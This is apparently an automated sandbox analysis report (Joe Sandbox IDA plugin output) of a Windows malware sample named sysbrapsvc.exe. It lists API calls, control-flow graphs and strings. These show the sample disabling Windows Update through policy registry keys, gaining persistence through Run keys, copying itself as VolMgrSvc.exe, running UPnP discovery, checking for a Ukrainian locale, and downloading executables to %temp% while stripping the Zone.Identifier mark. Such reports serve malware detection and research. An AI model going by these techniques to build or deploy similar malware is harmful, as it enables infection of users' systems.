Center\Svc$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$WindowsUpdate$WindowsUpdate$b7x663937xa$sysbrapsvc.exe
                                                                                • API String ID: 4172876685-2348032744
                                                                                • Opcode ID: f398f880ed0de63a829b11bb245c4d6d77eb93bd2f799ad59e9962a66de3a59f
                                                                                • Instruction ID: 03a0cce086b07e6777eb00571f2894b6de511c4d2cf633d1374b0a1cea72e181
                                                                                • Opcode Fuzzy Hash: f398f880ed0de63a829b11bb245c4d6d77eb93bd2f799ad59e9962a66de3a59f
                                                                                • Instruction Fuzzy Hash: D64256B1B80318BBE7209BA0DC4AFD93779AB48B11F10C5A5F305BA1D0DAF5A584CB5D

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 83 406650-406665 _chkstk 84 406667-406669 83->84 85 40666e-406720 wsprintfW * 5 PathFileExistsW 83->85 86 406b48-406b4b 84->86 87 406722-406743 call 40ec20 85->87 88 406764-406773 PathFileExistsW 85->88 87->88 97 406745-40675e SetFileAttributesW DeleteFileW 87->97 89 406803-406812 PathFileExistsW 88->89 90 406779-4067a7 SetFileAttributesW DeleteFileW PathFileExistsW 88->90 94 406814-40681a 89->94 95 406859-40687a FindFirstFileW 89->95 92 4067a9-4067ba CreateDirectoryW 90->92 93 4067cb-4067da PathFileExistsW 90->93 92->93 100 4067bc-4067c5 SetFileAttributesW 92->100 93->89 101 4067dc-4067f2 CopyFileW 93->101 102 406834-406847 call 406400 94->102 103 40681c-406832 call 406400 94->103 98 406880-406938 95->98 99 406b42 95->99 97->88 104 406942-406956 lstrcmpW 98->104 99->86 100->93 101->89 105 4067f4-4067fd SetFileAttributesW 101->105 112 40684a-406853 SetFileAttributesW 102->112 103->112 108 406958-40696c lstrcmpW 104->108 109 40696e 104->109 105->89 108->109 113 406973-406984 108->113 114 406b19-406b2f FindNextFileW 109->114 112->95 115 406995-40699c 113->115 114->104 116 406b35-406b3c FindClose 114->116 117 4069ca-4069d3 115->117 118 40699e-4069bb lstrcmpiW 115->118 116->99 121 4069d5 117->121 122 4069da-4069eb 117->122 119 4069bd 118->119 120 4069bf-4069c6 118->120 119->115 120->117 121->114 124 4069fc-406a03 122->124 125 406a73-406a7c 124->125 126 406a05-406a22 PathMatchSpecW 124->126 129 406a83-406a92 PathFileExistsW 125->129 130 406a7e 125->130 127 406a24 126->127 128 406a26-406a6c wsprintfW SetFileAttributesW DeleteFileW 126->128 127->124 128->125 132 406a94 129->132 133 406a99-406ae9 wsprintfW * 2 129->133 130->114 132->114 134 406b03-406b13 MoveFileExW 133->134 135 406aeb-406b01 call 406510 133->135 134->114 135->114
                                                                                APIs
                                                                                • _chkstk.NTDLL(?,00406CC0,?,?,?), ref: 00406658
                                                                                • wsprintfW.USER32 ref: 0040668F
                                                                                • wsprintfW.USER32 ref: 004066AF
                                                                                • wsprintfW.USER32 ref: 004066CF
                                                                                • wsprintfW.USER32 ref: 004066EF
                                                                                • wsprintfW.USER32 ref: 00406708
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 00406718
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406751
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040675E
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 0040676B
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406785
                                                                                • DeleteFileW.KERNEL32(?), ref: 00406792
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 0040679F
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 004067B2
                                                                                • SetFileAttributesW.KERNEL32(?,00000002), ref: 004067C5
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 004067D2
                                                                                • CopyFileW.KERNEL32(0041A428,?,00000000), ref: 004067EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$wsprintf$ExistsPath$Attributes$Delete$CopyCreateDirectory_chkstk
                                                                                • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolMgrSvc.exe$%s\*$shell32.dll$shell32.dll
                                                                                • API String ID: 2120662298-3454820331
                                                                                • Opcode ID: 9bf2619cef5fba6853ff482bd73d2f59edf810866bcdaa708e9710542ec04caf
                                                                                • Instruction ID: c612be32194b3f0687db5988b06318d9a83eb4d95ba537684b9fbd0309d38362
                                                                                • Opcode Fuzzy Hash: 9bf2619cef5fba6853ff482bd73d2f59edf810866bcdaa708e9710542ec04caf
                                                                                • Instruction Fuzzy Hash: 33D164B5900258ABCB20DF50DC54FEA77B8BB48304F00C5EAF20AA6191D7B99BD4CF59

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 688 406510-40655f CreateDirectoryW wsprintfW FindFirstFileW 689 406565-406579 lstrcmpW 688->689 690 40663f-406642 688->690 691 406591 689->691 692 40657b-40658f lstrcmpW 689->692 694 40660c-406622 FindNextFileW 691->694 692->691 693 406593-4065dc wsprintfW * 2 692->693 695 4065f6-406606 MoveFileExW 693->695 696 4065de-4065f4 call 406510 693->696 694->689 697 406628-406639 FindClose RemoveDirectoryW 694->697 695->694 696->694 697->690
                                                                                APIs
                                                                                • CreateDirectoryW.KERNEL32(00406AFE,00000000), ref: 0040651F
                                                                                • wsprintfW.USER32 ref: 00406535
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0040654C
                                                                                • lstrcmpW.KERNEL32(?,00410FC4), ref: 00406571
                                                                                • lstrcmpW.KERNEL32(?,00410FC8), ref: 00406587
                                                                                • wsprintfW.USER32 ref: 004065AA
                                                                                • wsprintfW.USER32 ref: 004065CA
                                                                                • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406606
                                                                                • FindNextFileW.KERNEL32(000000FF,?), ref: 0040661A
                                                                                • FindClose.KERNEL32(000000FF), ref: 0040662F
                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 00406639
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                • String ID: %s\%s$%s\%s$%s\*
                                                                                • API String ID: 92872011-445461498
                                                                                • Opcode ID: 4d993e4b2371ed22e4f6f4ca18b818e1fed1a50a7be2704f398f1e399b769794
                                                                                • Instruction ID: 53594aa6cee022007eb09e89ff8d3070c1334f86b1d3d86e8b3ef453570f0988
                                                                                • Opcode Fuzzy Hash: 4d993e4b2371ed22e4f6f4ca18b818e1fed1a50a7be2704f398f1e399b769794
                                                                                • Instruction Fuzzy Hash: B2315BB5500218AFCB10DB60DC85FDA7778AB48701F40C5A5F609A3185DBB5DAD9CF58
                                                                                APIs
                                                                                • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                  • Part of subcall function 0040D5E0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D5FE
                                                                                • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                • setsockopt.WS2_32 ref: 004020D1
                                                                                • htons.WS2_32(?), ref: 00402101
                                                                                • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                  • Part of subcall function 0040D610: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D634
                                                                                  • Part of subcall function 0040D610: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D68F
                                                                                  • Part of subcall function 0040D610: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D6CC
                                                                                  • Part of subcall function 0040D610: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D6D7
                                                                                  • Part of subcall function 0040D610: DuplicateHandle.KERNEL32(00000000), ref: 0040D6DE
                                                                                  • Part of subcall function 0040D610: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D6F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                • String ID:
                                                                                • API String ID: 1603358586-0
                                                                                • Opcode ID: a09a2fb70ac58d7a455ce99dedba2fb0f2ccef32fdecf11c004df1e88a2033b1
                                                                                • Instruction ID: 3d527d3106709ffe12c11fbc149f9fb6bead9182873b01420bf0fd5d4f043c35
                                                                                • Opcode Fuzzy Hash: a09a2fb70ac58d7a455ce99dedba2fb0f2ccef32fdecf11c004df1e88a2033b1
                                                                                • Instruction Fuzzy Hash: C441B070640301BBD3209F649D0AF4B77E4AF44720F108A2DF6A9EA6D4E7F4E445C75A
                                                                                APIs
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 0040DBDA
                                                                                • htons.WS2_32(0000076C), ref: 0040DC10
                                                                                • inet_addr.WS2_32(239.255.255.250), ref: 0040DC1F
                                                                                • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DC3D
                                                                                  • Part of subcall function 0040AF30: htons.WS2_32(00000050), ref: 0040AF5D
                                                                                  • Part of subcall function 0040AF30: socket.WS2_32(00000002,00000001,00000000), ref: 0040AF7D
                                                                                  • Part of subcall function 0040AF30: connect.WS2_32(000000FF,?,00000010), ref: 0040AF96
                                                                                  • Part of subcall function 0040AF30: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AFC8
                                                                                • bind.WS2_32(000000FF,?,00000010), ref: 0040DC73
                                                                                • lstrlenA.KERNEL32(00411C48,00000000,?,00000010), ref: 0040DC8C
                                                                                • sendto.WS2_32(000000FF,00411C48,00000000), ref: 0040DC9B
                                                                                • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DCB5
                                                                                  • Part of subcall function 0040DD40: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DD8E
                                                                                  • Part of subcall function 0040DD40: Sleep.KERNEL32(000003E8), ref: 0040DD9E
                                                                                  • Part of subcall function 0040DD40: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DDBB
                                                                                  • Part of subcall function 0040DD40: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DDD1
                                                                                  • Part of subcall function 0040DD40: StrChrA.SHLWAPI(?,0000000D), ref: 0040DDFE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                • String ID: 239.255.255.250
                                                                                • API String ID: 726339449-2186272203
                                                                                • Opcode ID: e3877ef1b52134d83e5684ab209baab9a63aea7bea6a3d9c299911e37c6d3f39
                                                                                • Instruction ID: ef7ed27ddc10e69a95ecf683d08ad8987f4418d9446925fcf09c3d01f5f265dc
                                                                                • Opcode Fuzzy Hash: e3877ef1b52134d83e5684ab209baab9a63aea7bea6a3d9c299911e37c6d3f39
                                                                                • Instruction Fuzzy Hash: 7141F8B4E10208ABDB14DFE4E889BEEBBB5EF48304F108169F505B7390E7B55A44CB59
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                • htons.WS2_32(?), ref: 00401508
                                                                                • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                  • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
                                                                                  • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
                                                                                  • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
                                                                                • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                • String ID:
                                                                                • API String ID: 4174406920-0
                                                                                • Opcode ID: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                                                                • Instruction ID: ddf1df2f5e3c49f21769c3cd8a86baa6c810c68bf5de7ecead628d1f617bc177
                                                                                • Opcode Fuzzy Hash: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                                                                • Instruction Fuzzy Hash: 72319571A44301AFE320DF649C4AF9BB6E0AF48B14F40493DF695EB2E0D3B5D544879A
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040D1B2
                                                                                • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D1D8
                                                                                • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D20F
                                                                                • GetTickCount.KERNEL32 ref: 0040D224
                                                                                • Sleep.KERNEL32(00000001), ref: 0040D244
                                                                                • GetTickCount.KERNEL32 ref: 0040D24A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$Sleepioctlsocketrecv
                                                                                • String ID:
                                                                                • API String ID: 107502007-0
                                                                                • Opcode ID: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                                                                • Instruction ID: d1d91ce4da814b9a63f0d024f91aac80a52589da6ae3f0e8ee31fa34877a49b5
                                                                                • Opcode Fuzzy Hash: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                                                                • Instruction Fuzzy Hash: 5A31CA74D00209EFCF04DFA4DA48AEE77B1FF44315F1086A9E825A7290D7749A94CB59
                                                                                APIs
                                                                                • htons.WS2_32(00000050), ref: 0040AF5D
                                                                                  • Part of subcall function 0040AEF0: inet_addr.WS2_32(0040AF71), ref: 0040AEFA
                                                                                  • Part of subcall function 0040AEF0: gethostbyname.WS2_32(?), ref: 0040AF0D
                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 0040AF7D
                                                                                • connect.WS2_32(000000FF,?,00000010), ref: 0040AF96
                                                                                • getsockname.WS2_32(000000FF,?,00000010), ref: 0040AFC8
                                                                                Strings
                                                                                • www.update.microsoft.com, xrefs: 0040AF67
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                • String ID: www.update.microsoft.com
                                                                                • API String ID: 4063137541-1705189816
                                                                                • Opcode ID: 4ae1ef7093756838ff96254105526815b724e83601429590a4066d3349afa6d4
                                                                                • Instruction ID: 8d2b89a1e3841e6cd000a2b550c173cff20965c169263ef180e6ea1a6d777d84
                                                                                • Opcode Fuzzy Hash: 4ae1ef7093756838ff96254105526815b724e83601429590a4066d3349afa6d4
                                                                                • Instruction Fuzzy Hash: D1213BB0E103099BCB04DFE8D946AEEBBB5AF08300F108169E504F7390E7745A44CBAA
                                                                                APIs
                                                                                • CryptAcquireContextW.ADVAPI32(~@,00000000,00000000,00000001,F0000040,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C343
                                                                                • CryptGenRandom.ADVAPI32(~@,?,00000000,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C359
                                                                                • CryptReleaseContext.ADVAPI32(~@,00000000,?,?,0040C389,~@,00000004,?,?,0040C3BE,000000FF), ref: 0040C365
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                • String ID: ~@
                                                                                • API String ID: 1815803762-592544116
                                                                                • Opcode ID: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                                                                • Instruction ID: 830194fa38359529e853ee3f0456384099f2f8dd9552bb81b1528bc6e0449336
                                                                                • Opcode Fuzzy Hash: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                                                                • Instruction Fuzzy Hash: B3E01275654208BBDB24CFE1EC49FDA776CAB48B00F108154FB09D7190DAB5EA409BA8
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DA0D,00000000), ref: 004013D5
                                                                                • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                  • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
                                                                                  • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
                                                                                  • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
                                                                                • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                • String ID:
                                                                                • API String ID: 3943618503-0
                                                                                • Opcode ID: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
                                                                                • Instruction ID: 1e7a4891c1a42a5318b19a32161f2d9e989c632f85172a1bcc985bb178a8dbbc
                                                                                • Opcode Fuzzy Hash: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
                                                                                • Instruction Fuzzy Hash: 18119674A40710AFE3609F749C0AF877AE0AF04B14F50892DF699E62E1E2B49544878A
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,004075E8), ref: 0040EBF3
                                                                                • strcmp.NTDLL ref: 0040EC02
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: InfoLocalestrcmp
                                                                                • String ID: UKR
                                                                                • API String ID: 3191669094-64918367
                                                                                • Opcode ID: 60baf994038672de7e905354210f4f0cccfe67ebee51479d5c5c355a5e8cecad
                                                                                • Instruction ID: 39a3b49c0f9cc0ba3e3bafda0df6f1f41861fe80aa697247161161d98fc04bc2
                                                                                • Opcode Fuzzy Hash: 60baf994038672de7e905354210f4f0cccfe67ebee51479d5c5c355a5e8cecad
                                                                                • Instruction Fuzzy Hash: 9AE0CD3594830876DA1065A15C02BA6371C5711701F0000B5AF14A21C1E5765119926B

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040EF99
                                                                                • srand.MSVCRT ref: 0040EFA0
                                                                                • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EFC0
                                                                                • strlen.NTDLL ref: 0040EFCA
                                                                                • mbstowcs.NTDLL ref: 0040EFE1
                                                                                • rand.MSVCRT ref: 0040EFE9
                                                                                • rand.MSVCRT ref: 0040EFFD
                                                                                • wsprintfW.USER32 ref: 0040F024
                                                                                • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F03A
                                                                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F069
                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F098
                                                                                • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F0CB
                                                                                • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F0FC
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040F10B
                                                                                • wsprintfW.USER32 ref: 0040F124
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040F134
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040F13F
                                                                                • Sleep.KERNEL32(000007D0), ref: 0040F160
                                                                                • ExitProcess.KERNEL32 ref: 0040F188
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040F19E
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040F1AB
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040F1B8
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040F1C5
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040F1D0
                                                                                • rand.MSVCRT ref: 0040F1E5
                                                                                • Sleep.KERNEL32 ref: 0040F1FC
                                                                                • rand.MSVCRT ref: 0040F202
                                                                                • rand.MSVCRT ref: 0040F216
                                                                                • wsprintfW.USER32 ref: 0040F23D
                                                                                • DeleteUrlCacheEntryW.WININET(?), ref: 0040F24D
                                                                                • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F267
                                                                                • wsprintfW.USER32 ref: 0040F287
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040F297
                                                                                • Sleep.KERNEL32(000003E8), ref: 0040F2A2
                                                                                • Sleep.KERNEL32(000007D0), ref: 0040F2C3
                                                                                • ExitProcess.KERNEL32 ref: 0040F2EA
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040F2F9
                                                                                Strings
                                                                                • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040F035
                                                                                • %s\%d%d.exe, xrefs: 0040F018
                                                                                • %s\%d%d.exe, xrefs: 0040F231
                                                                                • %temp%, xrefs: 0040EFBB
                                                                                • %s:Zone.Identifier, xrefs: 0040F118
                                                                                • %s:Zone.Identifier, xrefs: 0040F27B
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
